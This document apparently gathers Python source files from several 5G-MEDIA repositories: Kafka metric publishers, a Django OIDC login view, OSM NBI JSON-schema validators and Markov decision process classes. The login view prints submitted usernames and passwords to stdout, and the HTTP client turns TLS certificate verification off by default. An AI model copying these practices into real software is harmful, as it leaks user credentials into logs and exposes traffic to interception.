"Load OSM entry for vTranscoder3D VNF uuid: `{}` from OSM".format(vnf_uuid))
# Save the entry in the Redis
redis_connection.set(name=redis_key, value=json.dumps(redis_record),
ex=REDIS_EXPIRATION_SECONDS)
if not mano_data_len:
raise OsmInfoNotFound(
"OSM data not found in OSM API for the VNF uuid: `{}`".format(vnf_uuid))
return mano_data
def publish_messages(metrics, mano_data, spectator):
""" Send the translated metrics in Kafka bus
Args:
metrics (list): The list of metrics
mano_data (dict): The OSM details for the given VNF
spectator (dict): The spectator details (client/group)
"""
producer = KafkaProducer(bootstrap_servers=KAFKA_SERVER, api_version=KAFKA_API_VERSION,
value_serializer=lambda v: json.dumps(v).encode('utf-8'))
for m in metrics:
adapted_metric = {"metric": m, "mano": mano_data, "spectator": spectator}
t = producer.send(KAFKA_TRANSLATION_TOPIC, adapted_metric)
# Block for 'synchronous' sends for X seconds
try:
t.get(timeout=KAFKA_TIMEOUT)
except KafkaError as ke:
logger.error(ke)
producer.close()
if __name__ == '__main__':
main()
``` |
{
"source": "5g-media/OIDC_ON_OSMr5",
"score": 2
} |
#### File: LW-UI_MODIFIED/authosm/views.py
```python
from django.shortcuts import render
from django.contrib.auth import login, logout, authenticate
from django.http import HttpResponseRedirect
import urllib
from django.conf import settings
# Create your views here.
def user_login(request):
logout(request)
error_message = ''
if request.POST:
print request.POST.get('username')
print request.POST.get('password')
next_page = request.POST.get('next')
next_page = urllib.unquote(next_page).decode('iso-8859-2')
try:
user = authenticate(username=request.POST.get('username'),
password=request.POST.get('password'),
project_id=request.POST.get('project_id'))
except Exception as e:
print e
res = HttpResponseRedirect('/auth')
res.set_cookie('logout_reason', '', max_age=10)
return res
if user and user.is_active:
if user.is_authenticated:
login(request, user)
request.session['projects'] = user.get_projects()
if next_page == "" or next_page is None:
return HttpResponseRedirect('/home')
else:
return HttpResponseRedirect(next_page)
else:
error_message = 'Login failed!'
#return render(request, 'login.html', {'error_message': error_message, 'collapsed_sidebar': False})
return render(request, 'login.html', {'error_message': error_message, 'collapsed_sidebar': False, 'OIDC_URL': settings.OIDC_URL})
```
#### File: NBI/osm_nbi/validation.py
```python
from jsonschema import validate as js_v, exceptions as js_e
from http import HTTPStatus
from copy import deepcopy
__author__ = "<NAME> <<EMAIL>>"
__version__ = "0.1"
version_date = "Mar 2018"
"""
Validator of input data using JSON schemas for those items that not contains an OSM yang information model
"""
# Basis schemas
patern_name = "^[ -~]+$"
shortname_schema = {"type": "string", "minLength": 1, "maxLength": 60, "pattern": "^[^,;()\\.\\$'\"]+$"}
passwd_schema = {"type": "string", "minLength": 1, "maxLength": 60}
name_schema = {"type": "string", "minLength": 1, "maxLength": 255, "pattern": "^[^,;()'\"]+$"}
string_schema = {"type": "string", "minLength": 1, "maxLength": 255}
xml_text_schema = {"type": "string", "minLength": 1, "maxLength": 1000, "pattern": "^[^']+$"}
description_schema = {"type": ["string", "null"], "maxLength": 255, "pattern": "^[^'\"]+$"}
id_schema_fake = {"type": "string", "minLength": 2, "maxLength": 36}
bool_schema = {"type": "boolean"}
null_schema = {"type": "null"}
# "pattern": "^[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}$"
id_schema = {"type": "string", "pattern": "^[a-fA-F0-9]{8}(-[a-fA-F0-9]{4}){3}-[a-fA-F0-9]{12}$"}
time_schema = {"type": "string", "pattern": "^[0-9]{4}-[0-1][0-9]-[0-3][0-9]T[0-2][0-9]([0-5]:){2}"}
pci_schema = {"type": "string", "pattern": "^[0-9a-fA-F]{4}(:[0-9a-fA-F]{2}){2}\\.[0-9a-fA-F]$"}
# allows [] for wildcards. For that reason huge length limit is set
pci_extended_schema = {"type": "string", "pattern": "^[0-9a-fA-F.:-\\[\\]]{12,40}$"}
http_schema = {"type": "string", "pattern": "^https?://[^'\"=]+$"}
bandwidth_schema = {"type": "string", "pattern": "^[0-9]+ *([MG]bps)?$"}
memory_schema = {"type": "string", "pattern": "^[0-9]+ *([MG]i?[Bb])?$"}
integer0_schema = {"type": "integer", "minimum": 0}
integer1_schema = {"type": "integer", "minimum": 1}
path_schema = {"type": "string", "pattern": "^(\\.){0,2}(/[^/\"':{}\\(\\)]+)+$"}
vlan_schema = {"type": "integer", "minimum": 1, "maximum": 4095}
vlan1000_schema = {"type": "integer", "minimum": 1000, "maximum": 4095}
mac_schema = {"type": "string",
"pattern": "^[0-9a-fA-F][02468aceACE](:[0-9a-fA-F]{2}){5}$"} # must be unicast: LSB bit of MSB byte ==0
dpid_Schema = {"type": "string", "pattern": "^[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){7}$"}
# mac_schema={"type":"string", "pattern":"^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$"}
ip_schema = {"type": "string",
"pattern": "^((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$"}
ip_prefix_schema = {"type": "string",
"pattern": "^((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}"
"(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)/(30|[12]?[0-9])$"}
port_schema = {"type": "integer", "minimum": 1, "maximum": 65534}
object_schema = {"type": "object"}
schema_version_2 = {"type": "integer", "minimum": 2, "maximum": 2}
# schema_version_string={"type":"string","enum": ["0.1", "2", "0.2", "3", "0.3"]}
log_level_schema = {"type": "string", "enum": ["DEBUG", "INFO", "WARNING", "ERROR", "CRITICAL"]}
checksum_schema = {"type": "string", "pattern": "^[0-9a-fA-F]{32}$"}
size_schema = {"type": "integer", "minimum": 1, "maximum": 100}
array_edition_schema = {
"type": "object",
"patternProperties": {
"^\\$": {}
},
"additionalProperties": False,
"minProperties": 1,
}
nameshort_list_schema = {
"type": "array",
"minItems": 1,
"items": shortname_schema,
}
ns_instantiate_vdu = {
"title": "ns action instantiate input schema for vdu",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"id": name_schema,
"volume": {
"type": "array",
"minItems": 1,
"items": {
"type": "object",
"properties": {
"name": name_schema,
"vim-volume-id": name_schema,
},
"required": ["name", "vim-volume-id"],
"additionalProperties": False
}
},
"interface": {
"type": "array",
"minItems": 1,
"items": {
"type": "object",
"properties": {
"name": name_schema,
"ip-address": ip_schema,
"mac-address": mac_schema,
"floating-ip-required": bool_schema,
},
"required": ["name"],
"additionalProperties": False
}
}
},
"required": ["id"],
"additionalProperties": False
}
ip_profile_dns_schema = {
"type": "array",
"minItems": 1,
"items": {
"type": "object",
"properties": {
"address": ip_schema,
},
"required": ["address"],
"additionalProperties": False
}
}
ip_profile_dhcp_schema = {
"type": "object",
"properties": {
"enabled": {"type": "boolean"},
"count": integer1_schema,
"start-address": ip_schema
},
"additionalProperties": False,
}
ip_profile_schema = {
"title": "ip profile validation schame",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"ip-version": {"enum": ["ipv4", "ipv6"]},
"subnet-address": ip_prefix_schema,
"gateway-address": ip_schema,
"dns-server": ip_profile_dns_schema,
"dhcp-params": ip_profile_dhcp_schema,
}
}
ip_profile_update_schema = {
"title": "ip profile validation schame",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"ip-version": {"enum": ["ipv4", "ipv6"]},
"subnet-address": {"oneOf": [null_schema, ip_prefix_schema]},
"gateway-address": {"oneOf": [null_schema, ip_schema]},
"dns-server": {"oneOf": [null_schema, ip_profile_dns_schema]},
"dhcp-params": {"oneOf": [null_schema, ip_profile_dhcp_schema]},
},
"additionalProperties": False
}
ns_instantiate_internal_vld = {
"title": "ns action instantiate input schema for vdu",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"name": name_schema,
"vim-network-name": name_schema,
"vim-network-id": name_schema,
"ip-profile": ip_profile_update_schema,
"internal-connection-point": {
"type": "array",
"minItems": 1,
"items": {
"type": "object",
"properties": {
"id-ref": name_schema,
"ip-address": ip_schema,
# "mac-address": mac_schema,
},
"required": ["id-ref"],
"minProperties": 2,
"additionalProperties": False
},
}
},
"required": ["name"],
"minProperties": 2,
"additionalProperties": False
}
additional_params_for_vnf = {
"type": "array",
"items": {
"type": "object",
"properties": {
"member-vnf-index": name_schema,
"additionalParams": object_schema,
},
"required": ["member-vnf-index", "additionalParams"],
"additionalProperties": False
}
}
ns_instantiate = {
"title": "ns action instantiate input schema",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"lcmOperationType": string_schema,
"nsInstanceId": id_schema,
"netsliceInstanceId": id_schema,
"nsName": name_schema,
"nsDescription": {"oneOf": [description_schema, {"type": "null"}]},
"nsdId": id_schema,
"vimAccountId": id_schema,
"additionalParamsForNs": object_schema,
"additionalParamsForVnf": additional_params_for_vnf,
"ssh_keys": {"type": "array", "items": {"type": "string"}},
"nsr_id": id_schema,
"vduImage": name_schema,
"vnf": {
"type": "array",
"minItems": 1,
"items": {
"type": "object",
"properties": {
"member-vnf-index": name_schema,
"vimAccountId": id_schema,
"vdu": {
"type": "array",
"minItems": 1,
"items": ns_instantiate_vdu,
},
"internal-vld": {
"type": "array",
"minItems": 1,
"items": ns_instantiate_internal_vld
}
},
"required": ["member-vnf-index"],
"minProperties": 2,
"additionalProperties": False
}
},
"vld": {
"type": "array",
"minItems": 1,
"items": {
"type": "object",
"properties": {
"name": string_schema,
"vim-network-name": {"OneOf": [string_schema, object_schema]},
"vim-network-id": {"OneOf": [string_schema, object_schema]},
"ip-profile": object_schema,
"vnfd-connection-point-ref": {
"type": "array",
"minItems": 1,
"items": {
"type": "object",
"properties": {
"member-vnf-index-ref": name_schema,
"vnfd-connection-point-ref": name_schema,
"ip-address": ip_schema,
# "mac-address": mac_schema,
},
"required": ["member-vnf-index-ref", "vnfd-connection-point-ref"],
"minProperties": 3,
"additionalProperties": False
},
}
},
"required": ["name"],
"additionalProperties": False
}
},
},
"required": ["nsName", "nsdId", "vimAccountId"],
"additionalProperties": False
}
ns_action = { # TODO for the moment it is only contemplated the vnfd primitive execution
"title": "ns action input schema",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"lcmOperationType": string_schema,
"nsInstanceId": id_schema,
"member_vnf_index": name_schema,
"vnf_member_index": name_schema, # TODO for backward compatibility. To remove in future
"vdu_id": name_schema,
"primitive": name_schema,
"primitive_params": {"type": "object"},
},
"required": ["primitive", "primitive_params"], # TODO add member_vnf_index
"additionalProperties": False
}
ns_scale = { # TODO for the moment it is only VDU-scaling
"title": "ns scale input schema",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"lcmOperationType": string_schema,
"nsInstanceId": id_schema,
"scaleType": {"enum": ["SCALE_VNF"]},
"scaleVnfData": {
"type": "object",
"properties": {
"vnfInstanceId": name_schema,
"scaleVnfType": {"enum": ["SCALE_OUT", 'SCALE_IN']},
"scaleByStepData": {
"type": "object",
"properties": {
"scaling-group-descriptor": name_schema,
"member-vnf-index": name_schema,
"scaling-policy": name_schema,
},
"required": ["scaling-group-descriptor", "member-vnf-index"],
"additionalProperties": False
},
},
"required": ["scaleVnfType", "scaleByStepData"], # vnfInstanceId
"additionalProperties": False
},
"scaleTime": time_schema,
},
"required": ["scaleType", "scaleVnfData"],
"additionalProperties": False
}
schema_version = {"type": "string", "enum": ["1.0"]}
schema_type = {"type": "string"}
vim_account_edit_schema = {
"title": "vim_account edit input schema",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"name": name_schema,
"description": description_schema,
"type": shortname_schema,
"vim": name_schema,
"datacenter": name_schema,
"vim_url": description_schema,
"vim_url_admin": description_schema,
"vim_tenant": name_schema,
"vim_tenant_name": name_schema,
"vim_username": shortname_schema,
"vim_password": <PASSWORD>,
"config": {"type": "object"}
},
"additionalProperties": False
}
vim_account_new_schema = {
"title": "vim_account creation input schema",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"schema_version": schema_version,
"schema_type": schema_type,
"name": name_schema,
"description": description_schema,
"vim": name_schema,
"datacenter": name_schema,
"vim_type": {"enum": ["openstack", "openvim", "vmware", "opennebula", "aws"]},
"vim_url": description_schema,
# "vim_url_admin": description_schema,
# "vim_tenant": name_schema,
"vim_tenant_name": name_schema,
"vim_user": shortname_schema,
"vim_password": <PASSWORD>_schema,
"config": {"type": "object"}
},
"required": ["name", "vim_url", "vim_type", "vim_user", "vim_password", "vim_tenant_name"],
"additionalProperties": False
}
wim_account_edit_schema = {
"title": "wim_account edit input schema",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"name": name_schema,
"description": description_schema,
"type": shortname_schema,
"wim": name_schema,
"wim_url": description_schema,
"user": shortname_schema,
"password": <PASSWORD>,
"config": {"type": "object"}
},
"additionalProperties": False
}
wim_account_new_schema = {
"title": "wim_account creation input schema",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"schema_version": schema_version,
"schema_type": schema_type,
"name": name_schema,
"description": description_schema,
"wim": name_schema,
"wim_type": {"enum": ["tapi", "onos", "odl", "dynpac"]},
"wim_url": description_schema,
"user": shortname_schema,
"password": <PASSWORD>,
"config": {"type": "object"}
},
"required": ["name", "wim_url", "wim_type"],
"additionalProperties": False
}
sdn_properties = {
"name": name_schema,
"description": description_schema,
"dpid": dpid_Schema,
"ip": ip_schema,
"port": port_schema,
"type": {"type": "string", "enum": ["opendaylight", "floodlight", "onos"]},
"version": {"type": "string", "minLength": 1, "maxLength": 12},
"user": shortname_schema,
"password": <PASSWORD>
}
sdn_new_schema = {
"title": "sdn controller information schema",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": sdn_properties,
"required": ["name", "port", 'ip', 'dpid', 'type'],
"additionalProperties": False
}
sdn_edit_schema = {
"title": "sdn controller update information schema",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": sdn_properties,
# "required": ["name", "port", 'ip', 'dpid', 'type'],
"additionalProperties": False
}
sdn_port_mapping_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"title": "sdn port mapping information schema",
"type": "array",
"items": {
"type": "object",
"properties": {
"compute_node": shortname_schema,
"ports": {
"type": "array",
"items": {
"type": "object",
"properties": {
"pci": pci_extended_schema,
"switch_port": shortname_schema,
"switch_mac": mac_schema
},
"required": ["pci"]
}
}
},
"required": ["compute_node", "ports"]
}
}
sdn_external_port_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"title": "External port information",
"type": "object",
"properties": {
"port": {"type": "string", "minLength": 1, "maxLength": 60},
"vlan": vlan_schema,
"mac": mac_schema
},
"required": ["port"]
}
# PDUs
pdu_interface = {
"type": "object",
"properties": {
"name": shortname_schema,
"mgmt": bool_schema,
"type": {"enum": ["overlay", 'underlay']},
"ip-address": ip_schema,
# TODO, add user, password, ssh-key
"mac-address": mac_schema,
"vim-network-name": shortname_schema, # interface is connected to one vim network, or switch port
"vim-network-id": shortname_schema,
# # provide this in case SDN assist must deal with this interface
# "switch-dpid": dpid_Schema,
# "switch-port": shortname_schema,
# "switch-mac": shortname_schema,
# "switch-vlan": vlan_schema,
},
"required": ["name", "mgmt", "ip-address"],
"additionalProperties": False
}
pdu_new_schema = {
"title": "pdu creation input schema",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"name": shortname_schema,
"type": shortname_schema,
"description": description_schema,
"shared": bool_schema,
"vims": nameshort_list_schema,
"vim_accounts": nameshort_list_schema,
"interfaces": {
"type": "array",
"items": pdu_interface,
"minItems": 1
}
},
"required": ["name", "type", "interfaces"],
"additionalProperties": False
}
pdu_edit_schema = {
"title": "pdu edit input schema",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"name": shortname_schema,
"type": shortname_schema,
"description": description_schema,
"shared": bool_schema,
"vims": {"oneOf": [array_edition_schema, nameshort_list_schema]},
"vim_accounts": {"oneOf": [array_edition_schema, nameshort_list_schema]},
"interfaces": {"oneOf": [
array_edition_schema,
{
"type": "array",
"items": pdu_interface,
"minItems": 1
}
]}
},
"additionalProperties": False,
"minProperties": 1
}
# USERS
user_new_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"title": "New user schema",
"type": "object",
"properties": {
"username": shortname_schema,
"password": <PASSWORD>,
"projects": nameshort_list_schema,
},
"required": ["username", "password", "projects"],
"additionalProperties": False
}
user_edit_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"title": "User edit schema for administrators",
"type": "object",
"properties": {
"password": <PASSWORD>,
"projects": {
"oneOf": [
nameshort_list_schema,
array_edition_schema
]
},
},
"minProperties": 1,
"additionalProperties": False
}
# PROJECTS
project_new_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"title": "New project schema for administrators",
"type": "object",
"properties": {
"name": shortname_schema,
"admin": bool_schema,
},
"required": ["name"],
"additionalProperties": False
}
project_edit_schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"title": "Project edit schema for administrators",
"type": "object",
"properties": {
"admin": bool_schema,
},
"additionalProperties": False,
"minProperties": 1
}
# GLOBAL SCHEMAS
nbi_new_input_schemas = {
"users": user_new_schema,
"projects": project_new_schema,
"vim_accounts": vim_account_new_schema,
"sdns": sdn_new_schema,
"ns_instantiate": ns_instantiate,
"ns_action": ns_action,
"ns_scale": ns_scale,
"pdus": pdu_new_schema,
}
nbi_edit_input_schemas = {
"users": user_edit_schema,
"projects": project_edit_schema,
"vim_accounts": vim_account_edit_schema,
"sdns": sdn_edit_schema,
"pdus": pdu_edit_schema,
}
# NETSLICE SCHEMAS
nsi_slice_instantiate = deepcopy(ns_instantiate)
nsi_slice_instantiate["title"] = "netslice subnet instantiation params input schema"
nsi_slice_instantiate["properties"]["id"] = name_schema
nsi_slice_instantiate["properties"]["additionalParamsForNsi"] = object_schema
nsi_slice_instantiate["properties"]["additionalParamsForSubnet"] = {
"type": "array",
"items": {
"type": "object",
"properties": {
"id": name_schema,
"additionalParamsForNs": object_schema,
"additionalParamsForVnf": additional_params_for_vnf
},
"required": ["id"],
"additionalProperties": False
}
}
del nsi_slice_instantiate["required"]
del nsi_slice_instantiate["properties"]["additionalParamsForNs"]
del nsi_slice_instantiate["properties"]["additionalParamsForVnf"]
nsi_vld_instantiate = {
"title": "netslice vld instantiation params input schema",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"name": string_schema,
"vim-network-name": {"OneOf": [string_schema, object_schema]},
"vim-network-id": {"OneOf": [string_schema, object_schema]},
"ip-profile": object_schema,
},
"required": ["name"],
"additionalProperties": False
}
nsi_instantiate = {
"title": "netslice action instantiate input schema",
"$schema": "http://json-schema.org/draft-04/schema#",
"type": "object",
"properties": {
"lcmOperationType": string_schema,
"nsiInstanceId": id_schema,
"nsiName": name_schema,
"nsiDescription": {"oneOf": [description_schema, {"type": "null"}]},
"nstId": string_schema,
"vimAccountId": id_schema,
"ssh_keys": {"type": "string"},
"nsi_id": id_schema,
"netslice-subnet": {
"type": "array",
"minItems": 1,
"items": nsi_slice_instantiate
},
"netslice-vld": {
"type": "array",
"minItems": 1,
"items": nsi_vld_instantiate
},
},
"required": ["nsiName", "nstId", "vimAccountId"],
"additionalProperties": False
}
nsi_action = {
}
nsi_terminate = {
}
class ValidationError(Exception):
def __init__(self, message, http_code=HTTPStatus.UNPROCESSABLE_ENTITY):
self.http_code = http_code
Exception.__init__(self, message)
def validate_input(indata, schema_to_use):
"""
Validates input data against json schema
:param indata: user input data. Should be a dictionary
:param schema_to_use: jsonschema to test
:return: None if ok, raises ValidationError exception on error
"""
try:
if schema_to_use:
js_v(indata, schema_to_use)
return None
except js_e.ValidationError as e:
if e.path:
error_pos = "at '" + ":".join(map(str, e.path)) + "'"
else:
error_pos = ""
raise ValidationError("Format error {} '{}' ".format(error_pos, e.message))
except js_e.SchemaError:
raise ValidationError("Bad json schema {}".format(schema_to_use), http_code=HTTPStatus.INTERNAL_SERVER_ERROR)
``` |
{
"source": "5g-media/opennebula-kafka-publisher",
"score": 3
} |
#### File: opennebula-kafka-publisher/httpclient/client.py
```python
import requests
from .baseclient import AbstractClient
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
class Client(AbstractClient):
def __init__(self, verify_ssl_cert=False):
self.verify_ssl_cert = verify_ssl_cert
super(Client, self).__init__()
def post(self, url, headers=None, payload=None, **kwargs):
"""Insert an entity.
Args:
url (str): the endpoint of the web service
headers (dict): the required HTTP headers, e.g., Accept: application/json
payload (str): the xml payload
kwargs (dict, optional): Additional arguments will be passed to the request.
Returns:
obj: a requests object
"""
response = requests.request("POST", url, data=payload, headers=headers, verify=self.verify_ssl_cert)
return response
```
#### File: 5g-media/opennebula-kafka-publisher/one_worker.py
```python
import json
import logging.config
import time
import schedule
from kafka import KafkaProducer
from kafka.errors import KafkaError
from nbi_api import identity
from utils import get_opennebula_vim_uuid, get_opennebula_vm_ids
from settings import LOGGING, SCHEDULER_MINUTES, KAFKA_API_VERSION, KAFKA_SERVER, KAFKA_OPENNEBULA_TOPIC, \
XML_RPC_SERVER, XML_RPC_SESSION, OSM_ADMIN_CREDENTIALS
from xmlrpc_api.one_vm_info import OneVMInfo
from xmlrpc_api.parser import export_data_from_one_vm_info
from utils import convert_unix_timestamp_to_datetime_str, get_unit_by_metric
logging.config.dictConfig(LOGGING)
logger = logging.getLogger(__name__)
def main():
""" Publish the VNFs related metrics in the KAFKA_OPENNEBULA_TOPIC while
the ones coming from standalone VMs such as the Traffic Manager in the KAFKA_TRAFFIC_MANAGER_TOPIC
Returns:
None
"""
producer = KafkaProducer(bootstrap_servers=KAFKA_SERVER, api_version=KAFKA_API_VERSION,
value_serializer=lambda v: json.dumps(v).encode('utf-8'))
# Get the UUID of the OpenNebula VIM
token = identity.bearer_token(OSM_ADMIN_CREDENTIALS.get('username'), OSM_ADMIN_CREDENTIALS.get('password'))
one_vim_uuid = get_opennebula_vim_uuid(token)
# Get the list of VM ids of the OpenNebula NSs
vm_ids = get_opennebula_vm_ids(token, one_vim_uuid)
logger.info('The list of VMs {} have been detected given the VIM uuid `{}``'.format(vm_ids, one_vim_uuid))
# Get the metrics for each running VM in OpenNebula instantiated due to the OSM
for vm_id in vm_ids:
# Get the info of the VM by given session and VM id
one_vm_info = OneVMInfo()
response = one_vm_info.get(XML_RPC_SERVER, XML_RPC_SESSION, vm_id)
raw_response = response.text
# Parse the response and keep the monitoring metrics as a dict
monitoring_info, last_poll = export_data_from_one_vm_info(raw_response)
if last_poll is None:
logger.warning("The last poll is {}".format(last_poll))
return
# Convert the unix time in UCT iso8601 format
timestamp = convert_unix_timestamp_to_datetime_str(float(last_poll))
for metric, value in monitoring_info.items():
metric_type = metric.lower()
payload = {"vdu_uuid": vm_id, "type": metric_type, "value": value,
"unit": get_unit_by_metric(metric_type), "timestamp": timestamp}
# Publish the metric
request = producer.send(KAFKA_OPENNEBULA_TOPIC, payload)
try:
# set timeout in 5 sec
request.get(timeout=5)
except KafkaError as ke:
logger.error(ke)
producer.close()
if __name__ == '__main__':
# Retrieve the data every X minutes
schedule.every(int(SCHEDULER_MINUTES)).minutes.do(main)
while True:
schedule.run_pending()
time.sleep(1)
``` |
{
"source": "5g-media/openstack-kafka-publisher",
"score": 2
} |
#### File: openstack-kafka-publisher/kafka_inf/publisher.py
```python
import threading, logging, time
from kafka import KafkaProducer
from kafka.errors import KafkaError
import json
data = {
'source': 'openstack',
'counter_type': 'gauge',
'project_id': '9f89d937198543e6b38a89d8503142d5',
'timestamp': '2018-03-21T16:27:45.273549',
'resource_id': '50a3a175-42a4-42d4-8a10-e0f0cf16c1a0',
'message_id': 'c97bb281-2d24-11e8-9c8a-150e18cb77dc',
'user_id': 'cf180fadfb214e12aa90a5ccafe10383',
'message_signature': 'dd6c21aa535dbc188e9991ea24a889203ca3eb52c5297a04e1bdef09c9905c7b',
'resource_metadata': {
'os_type': 'hvm',
'display_name': 'test',
'image_ref': '6fadef71-6608-4ba2-9cee-671a1aa5edba',
'task_state': '',
'instance_host': 'pike2',
'root_gb': 1,
'state': 'running',
'name': 'instance-00000006',
'memory_mb': 512,
'flavor': {
'swap': 0,
'disk': 1,
'ram': 512,
'vcpus': 1,
'ephemeral': 0,
'name': 'm1.tiny',
'id': '76949218-7a4f-4e7e-8269-f4e24c2832ab'
},
'architecture': 'x86_64',
'vcpus': 1,
'instance_id': '50a3a175-42a4-42d4-8a10-e0f0cf16c1a0',
'disk_gb': 1,
'instance_type': 'm1.tiny',
'ephemeral_gb': 0,
'status': 'active',
'image_ref_url': None,
'cpu_number': 1,
'image': {
'id': '6fadef71-6608-4ba2-9cee-671a1aa5edba'
},
'host': '30b3a202bf71d8651cf49f4aa9232f79e029f87d47c081163fca9d12'
},
'counter_name': 'cpu_util',
'counter_unit': '%',
'monotonic_time': None,
'counter_volume': 2.0722654293387963
}
class Publisher(object):
def __init__(self, borker_ip_, port_, api_ver_):
self.borker_url = borker_ip_ + ':' + port_
self.api_verision = api_ver_
def pubJson(self, msg_, topic_):
producer = KafkaProducer(bootstrap_servers=self.borker_url, api_version=(1, 1, 0),
value_serializer=lambda v: json.dumps(v).encode('utf-8'))
record_metadata = None
t = producer.send(topic_, msg_)
# Set as timeout10 sec for 'synchronous' sends
try:
record_metadata = t.get(timeout=10)
except KafkaError as ex:
# Decide what to do if produce request failed...
pass
if __name__ == "__main__":
while (1):
print(time.time())
p = Publisher('192.168.1.107', '9092', '(1 , 10, 1)')
p.pubJson(topic_='monitoring1', msg_=data)
time.sleep(0.05)
``` |
{
"source": "5g-media/ss-cno-teleimmersive-game",
"score": 3
} |
#### File: ss-cno-teleimmersive-game/markovdp/exceptions.py
```python
class ParameterError(Exception):
"""Error class for unsupported or missing parameters."""
def __init__(self, message, logger=None):
super(ParameterError, self).__init__(message)
if logger is not None:
logger.error(message)
class StateNotSetError(Exception):
"""Raised when the model is used before setting the initial state."""
def __init__(self, logger=None):
super(StateNotSetError, self).__init__("State has not been set")
if logger is not None:
logger.error("State has not been set")
class InternalError(Exception):
"""Raised for errors that are caused by internal bugs. These will never happen."""
def __init__(self, message, logger=None):
super(InternalError, self).__init__(message)
if logger is not None:
logger.error(message)
class ConfigurationError(Exception):
"""Error class for errors in the configuration file."""
def __init__(self, message, logger=None):
super(ConfigurationError, self).__init__(message)
if logger is not None:
logger.error(message)
```
#### File: ss-cno-teleimmersive-game/markovdp/state.py
```python
class State(object):
"""State Class.
The role of this class is to represent a state in the MDP Model.
Attributes:
_q_states (list): The q-states of this state
_value (double): The value of the state
_best_q_state (Q-state): Q-state with highest Q-value
_times_visited (int): The number of visits to this state
Args:
parameters (list): The list of parameters of this state
state_num (int): Unique number of state in MDP model
total_states (int): The total number of visited states
"""
def __init__(self, parameters=None, state_num=0, total_states=0):
"""State class constructor."""
self._best_q_state = None
self._parameters = [] if parameters is None else list(parameters)
self._q_states = []
self._state_num = state_num
self._times_visited = 0
self._total_states = total_states
self._value = 0
@property
def best_q_state(self):
"""Gets the Q-state with the highest Q-value"""
return self._best_q_state
@property
def parameters(self):
"""Gets list of the parameters for this state."""
return self._parameters
@property
def q_states(self):
"""Gets Q-states for the current state."""
return self._q_states
@property
def state_num(self):
"""Gets the unique number of the state in the MDP model."""
return self._state_num
@property
def total_states(self):
"""Gets the total number of states in MDP model."""
return self._total_states
@total_states.setter
def total_states(self, total_states):
self._total_states = total_states
@property
def value(self):
"""The current value of the state."""
return self._value
def visit(self):
"""Increments the number of times the state has been visited."""
self._times_visited += 1
def get_optimal_action(self):
"""Returns the optimal action for this state."""
return self._best_q_state.action
def best_action_num_taken(self):
"""Number of executions of the optimal action."""
return self._best_q_state.action_taken_times()
def update_value(self):
"""Updates the value of the state based on the values of its Q-states."""
self._best_q_state = self._q_states[0]
self._value = self._q_states[0].q_value
for q_state in self._q_states:
if q_state.q_value > self._value:
self._best_q_state = q_state
self._value = q_state.q_value
def add_new_parameter(self, name, values):
"""Adds a new parameter-value pair to the list of parameters of the state.
Args:
name (str): Name of parameter
values (double): Value of the parameter
"""
self._parameters.append((name, values))
def get_parameter(self, parameter):
"""Returns the value for the given parameter.
Args:
parameter (str): The name of a parameter
Returns:
value (double): The value of the parameter
"""
for param, value in self.parameters:
if param == parameter:
return value
return None
def add_q_state(self, q_state):
""" Adds a new Q-state to this State.
Args:
q_state (object): The Q-state to add to current State
"""
self._q_states.append(q_state)
if self._best_q_state is None:
self._best_q_state = q_state
def get_q_state(self, action):
"""Gets the Q-state that corresponds to the given action.
Args:
action (str, int): An action tuple with action name and value
Returns:
q_state (QState): Q-state corresponding to action
"""
for q_state in self._q_states:
if q_state.action == action:
return q_state
def get_max_transitions(self):
"""Maximum transition probability for any action.
Returns:
transitions (dict): Maximum transition probability per transition
"""
transitions = {}
for i in range(self._total_states):
for q_state in self._q_states:
if q_state.has_transition(i):
if i in transitions:
transitions[i] = max(transitions[i], q_state.get_transition(i))
else:
transitions[i] = q_state.get_transition(i)
return transitions
def get_legal_actions(self):
"""Returns all the possible actions from this state.
Returns:
actions (str, int): Possible actions for this state.
"""
return [q_state.action for q_state in self._q_states]
def __str__(self):
return "{}: {}".format(self._state_num, str(self._parameters))
def __repr__(self):
return str(self)
def print_detailed(self):
"""Prints the details of the state and its Q-states."""
print("{}: {}, visited: {}".format(self._state_num, str(self._parameters), self._times_visited))
for qs in self._q_states:
print(qs)
print()
```
#### File: ss-cno-teleimmersive-game/runner/cno_algorithm_runner.py
```python
import json
import logging.config
import os
import os.path
from django.conf import settings
from markovdp.constants import MDP, MDP_DT, NO_OP
from markovdp.mdp_dt_model import MDPDTModel
from markovdp.mdp_model import MDPModel
from runner.constants import NO_OP
